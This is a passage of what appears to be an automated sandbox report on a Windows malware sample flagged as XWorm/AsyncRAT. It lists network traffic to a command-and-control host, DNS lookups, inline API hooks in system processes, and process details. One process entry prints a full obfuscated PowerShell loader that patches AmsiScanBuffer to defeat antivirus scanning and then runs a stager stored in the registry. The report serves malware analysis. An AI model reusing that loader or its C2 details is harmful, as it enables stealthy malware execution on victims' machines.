                                                Jul 2, 2024 00:31:14.043679953 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.048641920 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.224174023 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.231005907 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.336869001 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.343239069 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.423723936 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.430355072 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.430829048 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.430860996 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.430916071 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.430958986 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.432171106 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.432202101 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.432570934 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.432676077 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.445051908 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.451576948 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.553395033 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.563580036 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.662677050 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.669680119 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.772084951 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.778834105 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.881479025 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.887845039 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:14.990904093 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:14.995982885 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:15.100229025 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:15.107449055 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:15.149070978 CEST3612549732147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:15.163075924 CEST4973236125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:18.669118881 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:18.673964977 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:18.952692986 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:18.954624891 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:18.959419966 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:22.696552992 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:22.740698099 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:31.600431919 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:31.605642080 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:31.880990028 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:31.885062933 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:31.890081882 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:44.525063992 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:44.530133009 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:44.817080975 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:44.818600893 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:44.826765060 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:52.686772108 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:52.740854979 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:57.444329977 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:57.451209068 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:57.726078987 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:31:57.727556944 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:31:57.734262943 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:10.367654085 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:10.374784946 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:10.649580002 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:10.697163105 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:14.677217007 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:14.684583902 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:17.137096882 CEST8049730208.95.112.1192.168.2.4
                                                Jul 2, 2024 00:32:17.139858961 CEST4973080192.168.2.4208.95.112.1
                                                Jul 2, 2024 00:32:22.681674004 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:22.772145987 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:32.367314100 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:32.372170925 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:32.646375895 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:32.772186995 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:47.803749084 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:47.810785055 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:48.085403919 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:48.178487062 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:50.180651903 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:32:50.181072950 CEST4973080192.168.2.4208.95.112.1
                                                Jul 2, 2024 00:32:50.185614109 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:50.186018944 CEST8049730208.95.112.1192.168.2.4
                                                Jul 2, 2024 00:32:52.687392950 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:32:52.772301912 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:33:00.866539001 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:33:00.875073910 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:33:01.153036118 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:33:01.275445938 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:33:12.057208061 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:33:12.366014004 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:33:12.975420952 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:33:12.990947962 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:33:12.990967989 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:33:12.990978956 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:33:13.525734901 CEST3612549731147.185.221.20192.168.2.4
                                                Jul 2, 2024 00:33:13.526535988 CEST4973136125192.168.2.4147.185.221.20
                                                Jul 2, 2024 00:33:13.531362057 CEST3612549731147.185.221.20192.168.2.4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 2, 2024 00:31:03.803757906 CEST5066953192.168.2.41.1.1.1
                                                Jul 2, 2024 00:31:03.812812090 CEST53506691.1.1.1192.168.2.4
                                                Jul 2, 2024 00:31:05.656450033 CEST6138353192.168.2.41.1.1.1
                                                Jul 2, 2024 00:31:05.666660070 CEST53613831.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jul 2, 2024 00:31:03.803757906 CEST192.168.2.41.1.1.10x4d65Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                Jul 2, 2024 00:31:05.656450033 CEST192.168.2.41.1.1.10xd2ceStandard query (0)session-chief.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jul 2, 2024 00:31:03.812812090 CEST1.1.1.1192.168.2.40x4d65No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                Jul 2, 2024 00:31:05.666660070 CEST1.1.1.1192.168.2.40xd2ceNo error (0)session-chief.gl.at.ply.gg147.185.221.20A (IP address)IN (0x0001)false
                                                Jul 2, 2024 00:31:19.449265003 CEST1.1.1.1192.168.2.40x2bd6No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                Jul 2, 2024 00:31:19.449265003 CEST1.1.1.1192.168.2.40x2bd6No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                Jul 2, 2024 00:31:31.893857956 CEST1.1.1.1192.168.2.40x8ca8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                Jul 2, 2024 00:31:31.893857956 CEST1.1.1.1192.168.2.40x8ca8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                • ip-api.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449730208.95.112.1806860C:\Users\user\AppData\Local\Temp\x4host.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 2, 2024 00:31:03.826421976 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                Jul 2, 2024 00:31:04.292587996 CEST175INHTTP/1.1 200 OK
                                                Date: Mon, 01 Jul 2024 22:31:03 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


                                                Code Manipulations

                                                Function NameHook TypeActive in Processes
                                                ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:18:30:56
                                                Start date:01/07/2024
                                                Path:C:\Users\user\Desktop\x433.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\x433.exe"
                                                Imagebase:0x560000
                                                File size:780'288 bytes
                                                MD5 hash:148EC472DF90B0FB274C3CE2AD2E811F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:18:30:59
                                                Start date:01/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x4Shellcode.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x4Shellcode.exe"
                                                Imagebase:0x400000
                                                File size:749'056 bytes
                                                MD5 hash:851BE4E85B0F111883680E87099483A3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 96%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:18:30:59
                                                Start date:01/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x4host.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x4host.exe"
                                                Imagebase:0xfb0000
                                                File size:70'144 bytes
                                                MD5 hash:FD744070409A72B86CC2B344D1719B33
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x4host.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x4host.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x4host.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 92%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                Target ID:3
                                                Start time:18:30:59
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tYvGzbpkOpfGRXdvJJH=rLleiAFHAZAE @([String])([IntPtr]);$HEnSxsRJwrbfoKRDZnGDoe=rLleiAFHAZAE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BvRkuAkFmTg=$GGVrSjgYYZyVF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ul'+[Char](101)+'H'+[Char](97)+'n'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+'e'+'l'+'32.'+[Char](100)+''+[Char](108)+''+'l'+'')));$JhuBDoUfjiRKob=$VrBFKSFCQkTmpL.Invoke($Null,@([Object]$BvRkuAkFmTg,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$XcIvzGHQpacLzdWNl=$VrBFKSFCQkTmpL.Invoke($Null,@([Object]$BvRkuAkFmTg,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$LyzHycQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhuBDoUfjiRKob,$tYvGzbpkOpfGRXdvJJH).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$nrzKdroJBYOrdatEY=$VrBFKSFCQkTmpL.Invoke($Null,@([Object]$LyzHycQ,[Object](''+'A'+'msi'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+'e'+'r'+'')));$GeTemELLqv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcIvzGHQpacLzdWNl,$HEnSxsRJwrbfoKRDZnGDoe).Invoke($nrzKdroJBYOrdatEY,[uint32]8,4,[ref]$GeTemELLqv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nrzKdroJBYOrdatEY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcIvzGHQpacLzdWNl,$HEnSxsRJwrbfoKRDZnGDoe).Invoke($nrzKdroJBYOrdatEY,[uint32]8,0x20,[ref]$GeTemELLqv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](120)+''+'4'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:18:30:59
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:18:31:02
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\dllhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}
                                                Imagebase:0x7ff7699e0000
                                                File size:21'312 bytes
                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:6
                                                Start time:18:31:02
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\winlogon.exe
                                                Wow64 process (32bit):false
                                                Commandline:winlogon.exe
                                                Imagebase:0x7ff7cd660000
                                                File size:906'240 bytes
                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:7
                                                Start time:18:31:02
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\lsass.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\lsass.exe
                                                Imagebase:0x7ff7a2ae0000
                                                File size:59'456 bytes
                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:8
                                                Start time:18:31:03
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:9
                                                Start time:18:31:03
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\dwm.exe
                                                Wow64 process (32bit):false
                                                Commandline:"dwm.exe"
                                                Imagebase:0x7ff74e710000
                                                File size:94'720 bytes
                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:10
                                                Start time:18:31:05
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:11
                                                Start time:18:31:06
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                Imagebase:0x7ff6eef20000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:12
                                                Start time:18:31:06
                                                Start date:01/07/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
